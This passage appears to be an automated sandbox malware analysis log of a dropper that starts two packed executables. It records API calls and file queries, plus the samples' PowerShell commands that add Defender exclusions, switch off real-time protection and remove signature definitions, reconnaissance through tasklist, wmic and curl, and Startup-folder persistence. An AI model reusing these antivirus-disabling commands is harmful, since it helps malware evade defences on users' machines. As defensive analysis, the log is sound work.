              Source: C:\Users\user\Desktop\Creal.exe Code function: 2_2_00007FF6D925A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6D925A614
              Source: C:\Users\user\Desktop\Creal.exe Code function: 2_2_00007FF6D924C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF6D924C8A0
              Source: C:\Users\user\Desktop\Creal.exe Code function: 2_2_00007FF6D924D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6D924D12C
              Source: C:\Users\user\Desktop\Built.exe Code function: 3_2_00007FF65E28C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF65E28C8A0
              Source: C:\Users\user\Desktop\Built.exe Code function: 3_2_00007FF65E28D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF65E28D12C
              Source: C:\Users\user\Desktop\Built.exe Code function: 3_2_00007FF65E29A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF65E29A614
              Source: C:\Users\user\Desktop\Built.exe Code function: 3_2_00007FF65E28D30C SetUnhandledExceptionFilter,3_2_00007FF65E28D30C
              Source: C:\Users\user\Desktop\Built.exe Code function: 4_2_00007FF65E28C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF65E28C8A0
              Source: C:\Users\user\Desktop\Built.exe Code function: 4_2_00007FF65E28D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF65E28D12C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E29A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF65E29A614
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E28D30C SetUnhandledExceptionFilter,4_2_00007FF65E28D30C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92433028 IsProcessorFeaturePresent,00007FFDA54E1730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDA54E1730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFD92433028
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9359212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFD9359212B
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591CB7 SetUnhandledExceptionFilter,4_2_00007FFD93591CB7
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9360DFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFD9360DFFC
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33ED070 SetUnhandledExceptionFilter,4_2_00007FFDA33ED070
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33E314C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFDA33E314C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D924D30C SetUnhandledExceptionFilter,5_2_00007FF6D924D30C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D925A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6D925A614
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D924C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF6D924C8A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D924D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6D924D12C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A21960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A21960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A21390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A21390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A31390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A31390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A31960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A31960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A41390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A41390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A41960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A41960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A51390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A51390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A51960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A51960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A61390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A61390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A61960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A61960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A71390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A71390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A71960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A71960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A81390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A81390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A81960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A81960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A91390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A91390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A91960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A91960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AA1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AA1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AA1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AA1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AB1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AB1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AB1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AB1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AC1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AC1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AC1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AC1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AD1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AD1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AD1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AD1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AE1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AE1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AE1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AE1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AF1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AF1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AF1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AF1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B01390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89B01390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B01960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89B01960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B11960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89B11960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B11390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89B11390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B21960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89B21960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B21390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89B21390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89D83248 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89D83248
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89D82C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89D82C90
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1A2920 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD8A1A2920
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1FC080 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD8A1FC080
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1FBAC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD8A1FBAC0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2212B IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD8AF2212B
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A26339C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9A26339C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A262970 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD9A262970
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DA2FE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD9DA2FE30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DA303E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9DA303E8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DB63220 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD9DB63220

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60639ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60639ECE0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe"
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe"
              Source: C:\Users\user\Desktop\Creal.exeProcess created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\Creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: 0_2_00007FF6063B8DF0 cpuid 0_2_00007FF6063B8DF0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF60639DE44
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\certifi VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography-43.0.3.dist-info\license_files VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
              Source: C:\Users\user\Desktop\Creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\Desktop\Built.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip VolumeInformationJump to behavior
